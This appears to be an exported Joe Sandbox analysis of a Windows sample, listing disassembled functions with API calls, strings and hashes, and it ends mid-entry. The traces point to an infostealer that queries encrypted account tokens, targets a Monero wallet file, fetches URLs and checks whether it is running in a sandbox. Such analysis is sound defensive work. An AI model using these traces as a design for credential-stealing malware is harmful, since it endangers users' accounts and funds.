Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
API String ID: 3073930149-1079375795
Opcode ID: a7604d8da45fff84f39806efe863af5a0001f5df11811fb35b0771afddb6a77d
Instruction ID: bf1916f3188128aa584078abd54bd5d727d6260dbce07087cc702724ecad300f
Opcode Fuzzy Hash: a7604d8da45fff84f39806efe863af5a0001f5df11811fb35b0771afddb6a77d
Instruction Fuzzy Hash: E3B164B19101049BEB04FBA1CC96EEE7339AF14304F50496FF50662191EF7C6A59CBBA

Function 00474FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00474FCA
RtlAllocateHeap.NTDLL(00000000), ref: 00474FD1
InternetOpenA.WININET(00490DDF,00000000,00000000,00000000,00000000), ref: 00474FEA
InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00475011
InternetReadFile.WININET(?,?,00000400,00000000), ref: 00475041
InternetCloseHandle.WININET(?), ref: 004750B9
InternetCloseHandle.WININET(?), ref: 004750C6

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
String ID:
API String ID: 3066467675-0
Opcode ID: 93894ef12e15cb625058f35afbae0bbe8e1f83c0d14282f5cb826e95589cf4ed
Instruction ID: 893dffae372fd35bb64f4ac6a07337d94abbb8ea5ad644568fc4406c5370838e
Opcode Fuzzy Hash: 93894ef12e15cb625058f35afbae0bbe8e1f83c0d14282f5cb826e95589cf4ed
Instruction Fuzzy Hash: D5310CF4A00218ABDB20DF54DC85BDDB7B5EB48704F1081D9E709A7280DBB46AC58F99

Function 004883DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON

Download Yara Rule

APIs

RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00488426
wsprintfA.USER32 ref: 00488459
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 0048847B
RegCloseKey.ADVAPI32(00000000), ref: 0048848C
RegCloseKey.ADVAPI32(00000000), ref: 00488499

Part of subcall function 0048A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0048A7E6

RegQueryValueExA.KERNEL32(00000000,0110DF60,00000000,000F003F,?,00000400), ref: 004884EC
lstrlen.KERNEL32(?), ref: 00488501
RegQueryValueExA.KERNEL32(00000000,0110DFD8,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00490B34), ref: 00488599
RegCloseKey.KERNEL32(00000000), ref: 00488608
RegCloseKey.ADVAPI32(00000000), ref: 0048861A

Strings

%s\%s, xrefs: 0048844D

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
String ID: %s\%s
API String ID: 3896182533-4073750446
Opcode ID: 1d52065d468d222c957083567478b59cd4314c2bfaceac6b4d103622a158270a
Instruction ID: 6d1365e725eee16cb296ad9eb85e26d83ed815e76535cda21552f88502ac1d58
Opcode Fuzzy Hash: 1d52065d468d222c957083567478b59cd4314c2bfaceac6b4d103622a158270a
Instruction Fuzzy Hash: 49210AB1900218ABDB24DB54DC85FE9B3B9FB48700F40C699E609A6140DF75AAC5CFE4

Function 00487690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 004876A4
RtlAllocateHeap.NTDLL(00000000), ref: 004876AB
RegOpenKeyExA.KERNEL32(80000002,010FC048,00000000,00020119,00000000), ref: 004876DD
RegQueryValueExA.KERNEL32(00000000,0110E0F8,00000000,00000000,?,000000FF), ref: 004876FE
RegCloseKey.ADVAPI32(00000000), ref: 00487708

Strings

Windows 11, xrefs: 004876BD

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID: Windows 11
API String ID: 3225020163-2517555085
Opcode ID: 442ed9b9e9e67b0b570d7976dffb15ac1a32fa098341c7335b30754d16b6c4ac
Instruction ID: d2e7bce008f2e405159aa3bde3488c491959fb1cdaa35e5bb475f6e284342a14
Opcode Fuzzy Hash: 442ed9b9e9e67b0b570d7976dffb15ac1a32fa098341c7335b30754d16b6c4ac
Instruction Fuzzy Hash: D101A2F8A04304BFDB00EBE0DD59F6EB7B9EB48700F104655FA05D7291EA74A980CB55

Function 00487720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00487734
RtlAllocateHeap.NTDLL(00000000), ref: 0048773B
RegOpenKeyExA.KERNEL32(80000002,010FC048,00000000,00020119,004876B9), ref: 0048775B
RegQueryValueExA.KERNEL32(004876B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0048777A
RegCloseKey.ADVAPI32(004876B9), ref: 00487784

Strings

CurrentBuildNumber, xrefs: 00487771

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID: CurrentBuildNumber
API String ID: 3225020163-1022791448
Opcode ID: c4a599c38dcaeef2a59b3c79f24eec2f0fb8db02b6db598fbac6f117439dcbc0
Instruction ID: 3b8668429cc0a394c23ff978b59a21bc33056484ef53db96f1a160ee800f1571
Opcode Fuzzy Hash: c4a599c38dcaeef2a59b3c79f24eec2f0fb8db02b6db598fbac6f117439dcbc0
Instruction Fuzzy Hash: 390117F9A40308BFDB00DFE4DC49FAEB7B9EB44705F104659FA05A7281DA745540CB55

Function 004840B0 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004840D5
RegOpenKeyExA.KERNEL32(80000001,0110D940,00000000,00020119,?), ref: 004840F4
RegQueryValueExA.ADVAPI32(?,0110E218,00000000,00000000,00000000,000000FF), ref: 00484118
RegCloseKey.ADVAPI32(?), ref: 00484122
lstrcat.KERNEL32(?,00000000), ref: 00484147
lstrcat.KERNEL32(?,0110E230), ref: 0048415B

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$CloseOpenQueryValuememset
String ID:
API String ID: 2623679115-0
Opcode ID: 11c38eaad181a1e1594d2f32b25a783f3d9750839b07052cf2fe794d2de77ec6
Instruction ID: 6f4dea2adf1394992b6cb75e4aa6c1249e345dfb928b5e8d6b408592f2409ff4
Opcode Fuzzy Hash: 11c38eaad181a1e1594d2f32b25a783f3d9750839b07052cf2fe794d2de77ec6
Instruction Fuzzy Hash: 774187B6D001087BDB14FBE0DC46FFE737DAB88304F408A5DB61956181EA795BC88B92

Function 004869F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00489860: GetProcAddress.KERNEL32(74DD0000,01102260), ref: 004898A1
Part of subcall function 00489860: GetProcAddress.KERNEL32(74DD0000,01102410), ref: 004898BA
Part of subcall function 00489860: GetProcAddress.KERNEL32(74DD0000,011024D0), ref: 004898D2
Part of subcall function 00489860: GetProcAddress.KERNEL32(74DD0000,01102428), ref: 004898EA
Part of subcall function 00489860: GetProcAddress.KERNEL32(74DD0000,01102440), ref: 00489903
Part of subcall function 00489860: GetProcAddress.KERNEL32(74DD0000,01109058), ref: 0048991B
Part of subcall function 00489860: GetProcAddress.KERNEL32(74DD0000,010F5710), ref: 00489933
Part of subcall function 00489860: GetProcAddress.KERNEL32(74DD0000,010F5A50), ref: 0048994C
Part of subcall function 00489860: GetProcAddress.KERNEL32(74DD0000,011022A8), ref: 00489964
Part of subcall function 00489860: GetProcAddress.KERNEL32(74DD0000,011022C0), ref: 0048997C
Part of subcall function 00489860: GetProcAddress.KERNEL32(74DD0000,011022D8), ref: 00489995
Part of subcall function 00489860: GetProcAddress.KERNEL32(74DD0000,011022F0), ref: 004899AD
Part of subcall function 00489860: GetProcAddress.KERNEL32(74DD0000,010F5730), ref: 004899C5
Part of subcall function 00489860: GetProcAddress.KERNEL32(74DD0000,01102278), ref: 004899DE

Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788

Part of subcall function 004711D0: ExitProcess.KERNEL32 ref: 00471211

Part of subcall function 00471160: GetSystemInfo.KERNEL32(?), ref: 0047116A
Part of subcall function 00471160: ExitProcess.KERNEL32 ref: 0047117E

Part of subcall function 00471110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0047112B
Part of subcall function 00471110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00471132
Part of subcall function 00471110: ExitProcess.KERNEL32 ref: 00471143

Part of subcall function 00471220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0047123E
Part of subcall function 00471220: __aulldiv.LIBCMT ref: 00471258
Part of subcall function 00471220: __aulldiv.LIBCMT ref: 00471266
Part of subcall function 00471220: ExitProcess.KERNEL32 ref: 00471294

Part of subcall function 00486770: GetUserDefaultLangID.KERNEL32 ref: 00486774

Part of subcall function 00471190: ExitProcess.KERNEL32 ref: 004711C6

Part of subcall function 00487850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004711B7), ref: 00487880
Part of subcall function 00487850: RtlAllocateHeap.NTDLL(00000000), ref: 00487887
Part of subcall function 00487850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0048789F

Part of subcall function 004878E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00487910
Part of subcall function 004878E0: RtlAllocateHeap.NTDLL(00000000), ref: 00487917
Part of subcall function 004878E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0048792F

Part of subcall function 0048A9B0: lstrlen.KERNEL32(?,01109178,?,\Monero\wallet.keys,00490E17), ref: 0048A9C5
Part of subcall function 0048A9B0: lstrcpy.KERNEL32(00000000), ref: 0048AA04
Part of subcall function 0048A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0048AA12

Part of subcall function 0048A8A0: lstrcpy.KERNEL32(?,00490E17), ref: 0048A905

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01108F38,?,0049110C,?,00000000,?,00491110,?,00000000,00490AEF), ref: 00486ACA
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00486AE8
CloseHandle.KERNEL32(00000000), ref: 00486AF9
Sleep.KERNEL32(00001770), ref: 00486B04
CloseHandle.KERNEL32(?,00000000,?,01108F38,?,0049110C,?,00000000,?,00491110,?,00000000,00490AEF), ref: 00486B1A
ExitProcess.KERNEL32 ref: 00486B22

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
String ID:
API String ID: 2525456742-0
Opcode ID: 9d8793d9fcd3c693680624316de4629464d578c1c4762df50f78759331bd5c8a
Instruction ID: e1a048ee0071cc31808b448249f2aba5b324e776b99f0c07290ef6ea132cd7f9
Opcode Fuzzy Hash: 9d8793d9fcd3c693680624316de4629464d578c1c4762df50f78759331bd5c8a
Instruction Fuzzy Hash: 9B311E71904208AAEB04F7E1DC56BEE7739AF04304F10496FF112A6192DFBC6945C7AA

Function 004799C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON

Download Yara Rule

APIs

